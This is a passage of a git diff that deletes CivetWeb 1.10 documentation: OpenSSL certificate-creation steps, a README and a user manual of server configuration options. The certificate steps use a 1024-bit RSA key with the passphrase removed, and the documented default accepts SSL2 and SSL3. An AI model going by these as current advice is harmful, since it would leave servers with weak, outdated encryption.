-OpenSSL provides a command line interface, that can be used to create the
-certificate file required by civetweb (server.pem).
-
-One can use the following steps in Windows (in Linux replace "copy" by "cp"
-and "type" by "cat"):
-
-<pre>
-  openssl genrsa -des3 -out server.key 1024
-
-  openssl req -new -key server.key -out server.csr
-
-  copy server.key server.key.orig
-
-  openssl rsa -in server.key.orig -out server.key
-
-  openssl x509 -req -days 3650 -in server.csr -signkey server.key -out server.crt
-
-  copy server.crt server.pem
-
-  type server.key >> server.pem
-</pre>
-
-The server.pem file created must contain a 'CERTIFICATE' section as well as a
-'RSA PRIVATE KEY' section. It should look like this (x represents BASE64
-encoded data):
-
-<pre>
------BEGIN CERTIFICATE-----
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxx
------END CERTIFICATE-----
------BEGIN RSA PRIVATE KEY-----
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------END RSA PRIVATE KEY-----
-</pre>
-
-
-Including a certificate from a certificate authority
-----
-
-CivetWeb requires one certificate file in PEM format.
-If you got multiple files from your certificate authority,
-you need to copy their content together into one file.
-Make sure the file has one section BEGIN RSA PRIVATE KEY /
-END RSA PRIVATE KEY, and at least one section
-BEGIN CERTIFICATE / END CERTIFICATE.
-In case you received a file with a section
-BEGIN PRIVATE KEY / END PRIVATE KEY,
-you may get a suitable file by adding the letters RSA manually.
-
-Set the "ssl_certificate" configuration parameter to the
-file name (including path) of the resulting *.pem file.
-
-The file must look like the file in the section
-"Creating a self signed certificate", but it will have several
-BEGIN CERTIFICATE / END CERTIFICATE sections.
-
-
-Common Problems
-----
-
-In case the OpenSSL configuration is not set up correctly, the server will not
-start. Configure an error log file in 'civetweb.conf' to get more information:
-<pre>
-  error_log_file error.log
-</pre>
-
-Check the content of 'error.log':
-
-<pre>
-load_dll: cannot load libeay32.*/libcrypto.*/ssleay32.*/libssl.*
-</pre>
-This error message means, the SSL library has not been installed (correctly).
-For Windows you might use the pre-built binaries. A link is available at the
-OpenSSL project home page (http://www.openssl.org/related/binaries.html).
-Choose the windows system folder as installation directory - this is the
-default location.
-
-<pre>
-set_ssl_option: cannot open server.pem: error:PEM routines:*:PEM_read_bio:no start line
-set_ssl_option: cannot open server.pem: error:PEM routines:*:PEM_read_bio:bad end line
-</pre>
-These error messages indicate, that the format of the ssl_certificate file does
-not match the expectations of the SSL library. The PEM file must contain both,
-a 'CERTIFICATE' and a 'RSA PRIVATE KEY' section. It should be a strict ASCII
-file without byte-order marks.
-The instructions above may be used to create a valid ssl_certificate file.
-
-
diff --git a/thirdparty/civetweb-1.10/docs/README.md b/thirdparty/civetweb-1.10/docs/README.md
deleted file mode 100644
index 9494409..0000000
--- a/thirdparty/civetweb-1.10/docs/README.md
+++ /dev/null
@@ -1,42 +0,0 @@
-![CivetWeb](https://raw.github.com/civetweb/civetweb/master/resources/civetweb_64x64.png "CivetWeb") CivetWeb
-=======
-
-CivetWeb is an easy to use, powerful, C/C++ embeddable web server with optional CGI, SSL and Lua support.
-
-CivetWeb can be used by developers as a library, to add web server functionality to an existing application.
-CivetWeb uses an [MIT license](https://github.com/civetweb/civetweb/blob/master/LICENSE.md).
-
-It can also be used by end users as a stand-alone web server. It is available as single executable, no installation is required.
-
-The current stable version is 1.9.1 - [release notes](https://github.com/civetweb/civetweb/blob/master/RELEASE_NOTES.md)
-
-
-End users can download CivetWeb at SourceForge
-[https://sourceforge.net/projects/civetweb/](https://sourceforge.net/projects/civetweb/)
-
-Developers can contribute to CivetWeb via GitHub
-[https://github.com/civetweb/civetweb](https://github.com/civetweb/civetweb)
-
-Trouble tickets should be filed on GitHub
-[https://github.com/civetweb/civetweb/issues](https://github.com/civetweb/civetweb/issues)
-
-Announcements are at Google Groups
-[https://groups.google.com/d/forum/civetweb](https://groups.google.com/d/forum/civetweb)
-
-While older support question and discussion threads have been at [Google groups](https://groups.google.com/d/forum/civetweb), most newer ones are [GitHub issues](https://github.com/civetweb/civetweb/issues).
-
-Source releases can be found on GitHub
-[https://github.com/civetweb/civetweb/releases](https://github.com/civetweb/civetweb/releases)
-
-
-Documentation
----------------
-
-- [Installing.md](Installing.md) - Install Guide (for end users using pre-built binaries)
-- [UserManual.md](UserManual.md) - End User Guide
-- [Building.md](Building.md) - Building the Server (quick start guide)
-- [Embedding.md](Embedding.md) - Embedding (how to add HTTP support to an existing application)
-- [OpenSSL.md](OpenSSL.md) - Adding HTTPS (SSL/TLS) support using OpenSSL.
-- [API documentation](api) - Additional documentation on the civetweb application programming interface ([civetweb.h](https://github.com/civetweb/civetweb/blob/master/include/civetweb.h)).
-
-[Authors](https://github.com/civetweb/civetweb/blob/master/CREDITS.md)
diff --git a/thirdparty/civetweb-1.10/docs/UserManual.md b/thirdparty/civetweb-1.10/docs/UserManual.md
deleted file mode 100644
index 3acf492..0000000
--- a/thirdparty/civetweb-1.10/docs/UserManual.md
+++ /dev/null
@@ -1,814 +0,0 @@
-
-Overview
-=====
-
-Civetweb is small and easy to use web server.
-It may be embedded into C/C++ host applications or used as a stand-alone
-server. See `Embedding.md` for information on embedding civetweb into
-host applications.
-
-The stand-alone server is self-contained, and does not require any external
-software to run. Some Windows users may need to install the
-[Visual C++ Redistributable](http://www.microsoft.com/en-us/download/details.aspx?id=30679).
-
-Installation
-----
-
-On Windows, UNIX and Mac, the civetweb stand-alone executable may be started
-from the command line.
-Running `civetweb` in a terminal, optionally followed by configuration parameters
-(`civetweb [OPTIONS]`) or a configuration file name (`civetweb [config_file_name]`),
-starts the web server.
-
-For UNIX and Mac, civetweb does not detach from the terminal.
-Pressing `Ctrl-C` keys will stop the server.
-
-On Windows, civetweb iconifies itself to the system tray icon when started.
-Right-click on the icon pops up a menu, where it is possible to stop
-civetweb, or configure it, or install it as Windows service.
-
-When started without options, the server exposes the local directory at
-[http](http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol) port 8080.
-Thus, the easiest way to share a folder on Windows is to copy `civetweb.exe`
-to this folder, double-click the exe, and launch a browser at
-[http://localhost:8080](http://localhost:8080). Note that 'localhost' should
-be changed to a machine's name if a folder is accessed from other computer.
-
-When started, civetweb first searches for the configuration file.
-If configuration file is specified explicitly in the command line, i.e.
-`civetweb path_to_config_file`, then specified configuration file is used.
-Otherwise, civetweb would search for file `civetweb.conf` in the same directory
-the executable is located, and use it. This configuration file is optional.
-
-The configuration file is a sequence of lines, each line containing one
-command line argument name and the corresponding value.
-Empty lines, and lines beginning with `#`, are ignored.
-Here is the example of `civetweb.conf` file:
-
-    document_root c:\www
-    listening_ports 80,443s
-    ssl_certificate c:\civetweb\ssl_cert.pem
-
-When a configuration file is used, additional command line arguments may
-override the configuration file settings.
-All command line arguments must start with `-`.
-
-For example: The above `civetweb.conf` file is used, and civetweb started as
-`civetweb -document_root D:\web`. Then the `D:\web` directory will be served
-as document root, because command line options take priority over the
-configuration file. The configuration options section below provides a good
-overview of the Civetweb features.
-
-Note that configuration options on the command line must start with `-`,
-but their names are the same as in the config file. All option names are
-listed in the next section. Thus, the following two setups are equivalent:
-
-    # Using command line arguments
-    $ civetweb -listening_ports 1234 -document_root /var/www
-
-    # Using config file
-    $ cat civetweb.conf
-    listening_ports 1234
-    document_root /var/www
-    $ civetweb
-
-Civetweb can also be used to modify `.htpasswd` passwords files:
-
-    civetweb -A <htpasswd_file> <realm> <user> <passwd>
-
-Unlike other web servers, civetweb does not require CGI scripts to be located
-in a special directory. CGI scripts can be anywhere. CGI (and SSI) files are
-recognized by the file name pattern. Civetweb uses shell-like glob
-patterns. Pattern match starts at the beginning of the string, so essentially
-patterns are prefix patterns. Syntax is as follows:
-
-     **      Matches everything
-     *       Matches everything but slash character, '/'
-     ?       Matches any character
-     $       Matches the end of the string
-     |       Matches if pattern on the left side or the right side matches.
-
-All other characters in the pattern match themselves. Examples:
-
-    **.cgi$      Any string that ends with .cgi
-    /foo         Any string that begins with /foo
-    **a$|**b$    Any string that ends with a or b
-
-# Configuration Options
-
-Below is a list of configuration options understood by Civetweb.
-Every option is followed by it's default value. If a default value is not
-present, then the default is empty.
-
-### cgi\_pattern `**.cgi$|**.pl$|**.php$`
-All files that match `cgi_pattern` are treated as CGI files. Default pattern
-allows CGI files be anywhere. To restrict CGIs to a certain directory,
-use `/path/to/cgi-bin/**.cgi` as pattern. Note that the full file path is
-matched against the pattern, not the URI.
-
-### cgi\_environment
-Extra environment variables to be passed to the CGI script in
-addition to standard ones. The list must be comma-separated list
-of name=value pairs, like this: `VARIABLE1=VALUE1,VARIABLE2=VALUE2`.
-
-### put\_delete\_auth\_file
-Passwords file for PUT and DELETE requests. Without password file, it will not
-be possible to, PUT new files to the server or DELETE existing ones. PUT and
-DELETE requests might still be handled by Lua scripts and CGI paged.
-
-### cgi\_interpreter
-Path to an executable to use as CGI interpreter for __all__ CGI scripts
-regardless of the script file extension. If this option is not set (which is
-the default), Civetweb looks at first line of a CGI script,
-[shebang line](http://en.wikipedia.org/wiki/Shebang_(Unix\)), for an
-interpreter (not only on Linux and Mac but also for Windows).
-
-For example, if both PHP and Perl CGIs are used, then
-`#!/path/to/php-cgi.exe` and `#!/path/to/perl.exe` must be first lines of the
-respective CGI scripts. Note that paths should be either full file paths,
-or file paths relative to the current working directory of the civetweb
-server. If civetweb is started by mouse double-click on Windows, the current
-working directory is the directory where the civetweb executable is located.
-
-If all CGIs use the same interpreter, for example they are all PHP, it is
-more efficient to set `cgi_interpreter` to the path to `php-cgi.exe`.
-The  shebang line in the CGI scripts can be omitted in this case.
-Note that PHP scripts must use `php-cgi.exe` as executable, not `php.exe`.
-
-### protect\_uri
-Comma separated list of URI=PATH pairs, specifying that given
-URIs must be protected with password files specified by PATH.
-All Paths must be full file paths.
-
-### authentication\_domain `mydomain.com`
-Authorization realm used for HTTP digest authentication. This domain is
-used in the encoding of the `.htpasswd` authorization files as well.
-Changing the domain retroactively will render the existing passwords useless.
-
-### enable\_auth\_domain\_check `yes`
-When using absolute URLs, verify the host is identical to the authentication\_domain. If enabled, requests to absolute URLs will only be processed 
-if they are directed to the domain. If disabled, absolute URLs to any host
-will be accepted.
-
-### ssi\_pattern `**.shtml$|**.shtm$`
-All files that match `ssi_pattern` are treated as Server Side Includes (SSI).
-
-SSI is a simple interpreted server-side scripting language which is most
-commonly used to include the contents of another file into a web page.
-It can be useful when it is desirable to include a common piece
-of code throughout a website, for example, headers and footers.
-
-In order for a webpage to recognize an SSI-enabled HTML file, the filename
-should end with a special extension, by default the extension should be
-either `.shtml` or `.shtm`. These extentions may be changed using the
-`ssi_pattern` option.
-
-Unknown SSI directives are silently ignored by civetweb. Currently, two SSI
-directives are supported, `<!--#include ...>` and
-`<!--#exec "command">`. Note that the `<!--#include ...>` directive supports
-three path specifications:
-
-    <!--#include virtual="path">  Path is relative to web server root
-    <!--#include abspath="path">  Path is absolute or relative to
-                                  web server working dir
-    <!--#include file="path">,    Path is relative to current document
-    <!--#include "path">
-
-The `include` directive may be used to include the contents of a file or the
-result of running a CGI script. The `exec` directive is used to execute a
-command on a server, and show the output that would have been printed to
-stdout (the terminal window) otherwise. Example:
-
-    <!--#exec "ls -l" -->
-
-For more information on Server Side Includes, take a look at the Wikipedia:
-[Server Side Includes](http://en.wikipedia.org/wiki/Server_Side_Includes)
-
-### throttle
-Limit download speed for clients.  `throttle` is a comma-separated
-list of key=value pairs, where key could be:
-
-    *                   limit speed for all connections
-    x.x.x.x/mask        limit speed for specified subnet
-    uri_prefix_pattern  limit speed for given URIs
-
-The value is a floating-point number of bytes per second, optionally
-followed by a `k` or `m` character, meaning kilobytes and
-megabytes respectively. A limit of 0 means unlimited rate. The
-last matching rule wins. Examples:
-
-    *=1k,10.0.0.0/8=0   limit all accesses to 1 kilobyte per second,
-                        but give connections the from 10.0.0.0/8 subnet
-                        unlimited speed
-
-    /downloads/=5k      limit accesses to all URIs in `/downloads/` to
-                        5 kilobytes per second. All other accesses are unlimited
-
-### access\_log\_file
-Path to a file for access logs. Either full path, or relative to the current
-working directory. If absent (default), then accesses are not logged.
-
-### enable\_directory\_listing `yes`
-Enable directory listing, either `yes` or `no`.
-
-### error\_log\_file
-Path to a file for error logs. Either full path, or relative to the current
-working directory. If absent (default), then errors are not logged.
-
-### global\_auth\_file
-Path to a global passwords file, either full path or relative to the current
-working directory. If set, per-directory `.htpasswd` files are ignored,
-and all requests are authorized against that file.
-
-The file has to include the realm set through `authentication_domain` and the
-password in digest format:
-
-    user:realm:digest
-    test:test.com:ce0220efc2dd2fad6185e1f1af5a4327
-
-Password files may be generated using `civetweb -A` as explained above, or
-online tools e.g. [this generator](http://www.askapache.com/online-tools/htpasswd-generator).
-
-### index\_files `index.xhtml,index.html,index.htm,index.cgi,index.shtml,index.php`
-Comma-separated list of files to be treated as directory index files.
-If more than one matching file is present in a directory, the one listed to the left
-is used as a directory index.
-
-In case built-in Lua support has been enabled, `index.lp,index.lsp,index.lua`
-are additional default index files, ordered before `index.cgi`.
-
-### enable\_keep\_alive `no`
-Enable connection keep alive, either `yes` or `no`.
-
-Allows clients to reuse TCP connection for subsequent HTTP requests, 
-which improves performance.
-For this to work when using request handlers it is important to add the
-correct Content-Length HTTP header for each request. If this is forgotten the
-client will time out.
-
-Note: If you set keep\_alive to `yes`, you should set keep\_alive\_timeout\_ms
-to some value > 0 (e.g. 500). If you set keep\_alive to `no`, you should set
-keep\_alive\_timeout\_ms to 0. Currently, this is done as a default value,
-but this configuration is redundant. In a future version, the keep\_alive 
-configuration option might be removed and automatically set to `yes` if 
-a timeout > 0 is set.
-
-### access\_control\_list
-An Access Control List (ACL) allows restrictions to be put on the list of IP
-addresses which have access to the web server. In the case of the Civetweb
-web server, the ACL is a comma separated list of IP subnets, where each
-subnet is pre-pended by either a `-` or a `+` sign. A plus sign means allow,
-where a minus sign means deny. If a subnet mask is omitted, such as `-1.2.3.4`,
-this means to deny only that single IP address.
-
-Subnet masks may vary from 0 to 32, inclusive. The default setting is to allow
-all accesses. On each request the full list is traversed, and
-the last match wins. Examples:
-
-    -0.0.0.0/0,+192.168/16    deny all accesses, only allow 192.168/16 subnet
-
-To learn more about subnet masks, see the
-[Wikipedia page on Subnetwork](http://en.wikipedia.org/wiki/Subnetwork).
-
-### extra\_mime\_types
-Extra mime types, in tha form `extension1=type1,exten-sion2=type2,...`.
-See the [Wikipedia page on Internet media types](http://en.wikipedia.org/wiki/Internet_media_type).
-Extension must include a leading dot. Example:
-`.cpp=plain/text,.java=plain/text`
-
-### listening\_ports `8080`
-Comma-separated list of ports to listen on. If the port is SSL, a
-letter `s` must be appended, for example, `80,443s` will open
-port 80 and port 443, and connections on port 443 will be SSL-ed.
-For non-SSL ports, it is allowed to append letter `r`, meaning 'redirect'.
-Redirect ports will redirect all their traffic to the first configured
-SSL port. For example, if `listening_ports` is `80r,443s`, then all
-HTTP traffic coming at port 80 will be redirected to HTTPS port 443.
-
-It is possible to specify an IP address to bind to. In this case,
-an IP address and a colon must be pre-pended to the port number.
-For example, to bind to a loopback interface on port 80 and to
-all interfaces on HTTPS port 443, use `127.0.0.1:80,443s`.
-
-If the server is built with IPv6 support, `[::]:8080` can be used to
-listen to IPv6 connections to port 8080. IPv6 addresses of network
-interfaces can be specified as well,
-e.g. `[::1]:8080` for the IPv6 loopback interface.
-
-[::]:80 will bind to port 80 IPv6 only. In order to use port 80 for
-all interfaces, both IPv4 and IPv6, use either the configuration
-`80,[::]:80` (create one socket for IPv4 and one for IPv6 only),
-or `+80` (create one socket for both, IPv4 and IPv6). 
-The `+`-notation to use IPv4 and IPv6 will only work in no network
-interface is specified. Depending on your operating system version
-and IPv6 network environment, some configurations might not work
-as expected, so you have to test to find the configuration most 
-suitable for your needs. In case `+80` does not work for your
-environment, you need to use `80,[::]:80`.
-
-It is possible to use network interface addresses (e.g., `192.0.2.3:80`,
-`[2001:0db8::1234]:80`). To get a list of available network interface
-addresses, use `ipconfig` (in a `cmd` window in Windows) or `ifconfig` 
-(in a Linux shell).
-Alternatively, you could use the hostname for an interface. Check the 
-hosts file of your operating system for a proper hostname 
-(for Windows, usually found in C:\Windows\System32\drivers\etc\, 
-for most Linux distributions: /etc/hosts). E.g., to bind the IPv6 
-local host, you could use `ip6-localhost:80`. This translates to 
-`[::1]:80`. Beside the hosts file, there are several other name
-resolution services. Using your hostname might bind you to the
-localhost or an external interface. You could also try `hostname.local`,
-if the proper network services are installed (Zeroconf, mDNS, Bonjour, 
-Avahi). When using a hostname, you need to test in your particular network
-environment - in some cases, you might need to resort to a fixed IP address.
-
-### document\_root `.`
-A directory to serve. By default, the current working directory is served.
-The current directory is commonly referenced as dot (`.`).
-It is recommended to use an absolute path for document\_root, in order to 
-avoid accidentally serving the wrong directory.
-
-### ssl\_certificate
-Path to the SSL certificate file. This option is only required when at least
-one of the `listening\_ports` is SSL. The file must be in PEM format,
-and it must have both, private key and certificate, see for example
-[ssl_cert.pem](https://github.com/civetweb/civetweb/blob/master/resources/ssl_cert.pem)
-A description how to create a certificate can be found in doc/OpenSSL.md
-
-### num\_threads `50`
-Number of worker threads. Civetweb handles each incoming connection in a
-separate thread. Therefore, the value of this option is effectively the number
-of concurrent HTTP connections Civetweb can handle.
-
-### run\_as\_user
-Switch to given user credentials after startup. Usually, this option is
-required when civetweb needs to bind on privileged ports on UNIX. To do
-that, civetweb needs to be started as root. From a security point of view,
-running as root is not advisable, therefore this option can be used to drop
-privileges. Example:
-
-    civetweb -listening_ports 80 -run_as_user webserver
-
-### url\_rewrite\_patterns
-Comma-separated list of URL rewrites in the form of
-`uri_pattern=file_or_directory_path`. When Civetweb receives any request,
-it constructs the file name to show by combining `document_root` and the URI.
-However, if the rewrite option is used and `uri_pattern` matches the
-requested URI, then `document_root` is ignored. Instead,
-`file_or_directory_path` is used, which should be a full path name or
-a path relative to the web server's current working directory. Note that
-`uri_pattern`, as all civetweb patterns, is a prefix pattern.
-
-This makes it possible to serve many directories outside from `document_root`,
-redirect all requests to scripts, and do other tricky things. For example,
-to redirect all accesses to `.doc` files to a special script, do:
-
-    civetweb -url_rewrite_patterns **.doc$=/path/to/cgi-bin/handle_doc.cgi
-
-Or, to imitate support for user home directories, do:
-
-    civetweb -url_rewrite_patterns /~joe/=/home/joe/,/~bill=/home/bill/
-
-### hide\_files\_patterns
-A pattern for the files to hide. Files that match the pattern will not
-show up in directory listing and return `404 Not Found` if requested. Pattern
-must be for a file name only, not including directory names. Example:
-
-    civetweb -hide_files_patterns secret.txt|**.hide
-
-Note: hide\_file\_patterns uses the pattern described above. If you want to
-hide all files with a certain extension, make sure to use **.extension
-(not just *.extension).
-
-### request\_timeout\_ms `30000`
-Timeout for network read and network write operations, in milliseconds.
-If a client intends to keep long-running connection, either increase this
-value or (better) use keep-alive messages.
-
-### keep\_alive\_timeout\_ms `500` or `0`
-Idle timeout between two requests in one keep-alive connection.
-If keep alive is enabled, multiple requests using the same connection 
-are possible. This reduces the overhead for opening and closing connections
-when loading several resources from one server, but it also blocks one port
-and one thread at the server during the lifetime of this connection.
-Unfortunately, browsers do not close the keep-alive connection after loading
-all resources required to show a website.
-The server closes a keep-alive connection, if there is no additional request
-from the client during this timeout.
-
-Note: if enable\_keep\_alive is set to `no` the value of 
-keep\_alive\_timeout\_ms should be set to `0`, if enable\_keep\_alive is set 
-to `yes`, the value of keep\_alive\_timeout\_ms must be >0.
-Currently keep\_alive\_timeout\_ms is ignored if enable\_keep\_alive is no,
-but future versions my drop the enable\_keep\_alive configuration value and
-automatically use keep-alive if keep\_alive\_timeout\_ms is not 0.
-
-### linger\_timeout\_ms
-Set TCP socket linger timeout before closing sockets (SO\_LINGER option).
-The configured value is a timeout in milliseconds. Setting the value to 0
-will yield in abortive close (if the socket is closed from the server side).
-Setting the value to -1 will turn off linger.
-If the value is not set (or set to -2), CivetWeb will not set the linger
-option at all.
-
-Note: For consistency with other timeouts, the value is configured in
-milliseconds. However, the TCP socket layer usually only offers a timeout in 
-seconds, so the value should be an integer multiple of 1000.
-
-### lua\_preload\_file
-This configuration option can be used to specify a Lua script file, which
-is executed before the actual web page script (Lua script, Lua server page
-or Lua websocket). It can be used to modify the Lua environment of all web
-page scripts, e.g., by loading additional libraries or defining functions
-required by all scripts.
-It may be used to achieve backward compatibility by defining obsolete
-functions as well.
-
-### lua\_script\_pattern `"**.lua$`
-A pattern for files that are interpreted as Lua scripts by the server.
-In contrast to Lua server pages, Lua scripts use plain Lua syntax.
-An example can be found in the test directory.
-
-### lua\_server\_page\_pattern `**.lp$|**.lsp$`
-Files matching this pattern are treated as Lua server pages.
-In contrast to Lua scripts, the content of a Lua server pages is delivered
-directly to the client. Lua script parts are delimited from the standard
-content by including them between <? and ?> tags.
-An example can be found in the test directory.
-
-### lua\_background\_script
-Experimental feature, and subject to change.
-Run a Lua script in the background, independent from any connection.
-The script is started before network access to the server is available.
-It can be used to prepare the document root (e.g., update files, compress
-files, ...), check for external resources, remove old log files, etc.
-
-The Lua state remains open until the server is stopped.
-In the future, some callback functions will be available to notify the
-script on changes of the server state. See example lua script :
-[background.lua](https://github.com/civetweb/civetweb/blob/master/test/background.lua).
-
-Additional functions available in background script :
-sleep, root path, script name, isterminated
-
-### lua\_background\_script\_params `param1=1,param2=2`
-Can add dynamic parameters to background script.
-Parameters mapped to global 'mg' table 'params' field.
-
-### websocket\_root
-In case civetweb is built with Lua and websocket support, Lua scripts may
-be used for websockets as well. Since websockets use a different URL scheme
-(ws, wss) than other http pages (http, https), the Lua scripts used for
-websockets may also be served from a different directory. By default,
-the document_root is used as websocket_root as well.
-
-
-### access\_control\_allow\_origin `*`
-Access-Control-Allow-Origin header field, used for cross-origin resource
-sharing (CORS).
-See the [Wikipedia page on CORS](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing).
-
-
-### access\_control\_allow\_methods `*`
-Access-Control-Allow-Methods header field, used for cross-origin resource
-sharing (CORS) pre-flight requests.
-See the [Wikipedia page on CORS](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing).
-
-If set to an empty string, pre-flights will not be supported directly by the server,
-but scripts may still support pre-flights by handling the OPTIONS method properly.
-If set to "*", the pre-flight will allow whatever method has been requested.
-If set to a comma separated list of valid HTTP methods, the pre-flight will return
-exactly this list as allowed method.
-If set in any other way, the result is unspecified.
-
-
-### access\_control\_allow\_headers `*`
-Access-Control-Allow-Headers header field, used for cross-origin resource
-sharing (CORS) pre-flight requests.
-See the [Wikipedia page on CORS](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing).
-
-If set to an empty string, pre-flights will not allow additional headers.
-If set to "*", the pre-flight will allow whatever headers have been requested.
-If set to a comma separated list of valid HTTP headers, the pre-flight will return
-exactly this list as allowed headers.
-If set in any other way, the result is unspecified.
-
-
-### error\_pages
-This option may be used to specify a directory for user defined error pages.
-The error pages may be specified for an individual http status code (e.g.,
-404 - page requested by the client not found), a group of http status codes
-(e.g., 4xx - all client errors) or all errors. The corresponding error pages
-must be called error404.ext, error4xx.ext or error.ext, whereas the file
-extention may be one of the extentions specified for the index_files option.
-See the [Wikipedia page on HTTP status codes](http://en.wikipedia.org/wiki/HTTP_status_code).
-
-### tcp\_nodelay `0`
-Enable TCP_NODELAY socket option on client connections.
-
-If set the socket option will disable Nagle's algorithm on the connection
-which means that packets will be sent as soon as possible instead of waiting
-for a full buffer or timeout to occur.
-
-    0    Keep the default: Nagel's algorithm enabled
-    1    Disable Nagel's algorithm for all sockets
-
-### static\_file\_max\_age `3600`
-Set the maximum time (in seconds) a cache may store a static files.
-
-This option will set the `Cache-Control: max-age` value for static files.
-Dynamically generated content, i.e., content created by a script or callback,
-must send cache control headers by themselfes.
-
-A value >0 corresponds to a maximum allowed caching time in seconds.
-This value should not exceed one year (RFC 2616, Section 14.21).
-A value of 0 will send "do not cache" headers for all static files.
-For values <0 and values >31622400, the behavior is undefined.
-
-### strict\_transport\_security\_max\_age
-
-Set the `Strict-Transport-Security` header, and set the `max-age` value.
-This instructs web browsers to interact with the server only using HTTPS,
-never by HTTP. If set, it will be sent for every request handled directly
-by the server, except scripts (CGI, Lua, ..) and callbacks. They must 
-send HTTP headers on their own.
-
-The time is specified in seconds. If this configuration is not set, 
-or set to -1, no `Strict-Transport-Security` header will be sent.
-For values <-1 and values >31622400, the behavior is undefined.
-
-### decode\_url `yes`
-URL encoded request strings are decoded in the server, unless it is disabled
-by setting this option to `no`.
-
-### ssl\_verify\_peer `no`
-Enable client's certificate verification by the server.
-
-### ssl\_ca\_path
-Name of a directory containing trusted CA certificates. Each file in the
-directory must contain only a single CA certificate. The files must be named
-by the subject name’s hash and an extension of “.0”. If there is more than one
-certificate with the same subject name they should have extensions ".0", ".1",
-".2" and so on respectively.
-
-### ssl\_ca\_file
-Path to a .pem file containing trusted certificates. The file may contain
-more than one certificate.
-
-### ssl\_verify\_depth `9`
-Sets maximum depth of certificate chain. If client's certificate chain is longer
-than the depth set here connection is refused.
-
-### ssl\_default\_verify\_paths `yes`
-Loads default trusted certificates locations set at openssl compile time.
-
-### ssl\_cipher\_list
-List of ciphers to present to the client. Entries should be separated by
-colons, commas or spaces.
-
-    ALL           All available ciphers
-    ALL:!eNULL    All ciphers excluding NULL ciphers
-    AES128:!MD5   AES 128 with digests other than MD5
-
-See [this entry](https://www.openssl.org/docs/manmaster/apps/ciphers.html) in
-OpenSSL documentation for full list of options and additional examples.
-
-### ssl\_protocol\_version `0`
-Sets the minimal accepted version of SSL/TLS protocol according to the table:
-
-Protocols | Value
------------- | -------------
-SSL2+SSL3+TLS1.0+TLS1.1+TLS1.2  | 0
-SSL3+TLS1.0+TLS1.1+TLS1.2  | 1
-TLS1.0+TLS1.1+TLS1.2 | 2
-TLS1.1+TLS1.2 | 3
-TLS1.2 | 4
-
-### ssl\_short\_trust `no`
-Enables the use of short lived certificates. This will allow for the certificates
-and keys specified in `ssl_certificate`, `ssl_ca_file` and `ssl_ca_path` to be
-exchanged and reloaded while the server is running.
-
-In an automated environment it is advised to first write the new pem file to
-a different filename and then to rename it to the configured pem file name to
-increase performance while swapping the certificate.
-
-Disk IO performance can be improved when keeping the certificates and keys stored
-on a tmpfs (linux) on a system with very high throughput.
-
-### allow\_sendfile\_call `yes`
-This option can be used to enable or disable the use of the Linux `sendfile` system call. It is only available for Linux systems and only affecting HTTP (not HTTPS) connections if `throttle` is not enabled. While using the `sendfile` call will lead to a performance boost for HTTP connections, this call may be broken for some file systems and some operating system versions.
-
-### case\_sensitive `no`
-This option can be uset to enable case URLs for Windows servers. It is only available for Windows systems. Windows file systems are not case sensitive, but they still store the file name including case. If this option is set to `yes`, the comparison for URIs and Windows file names will be case sensitive.
-
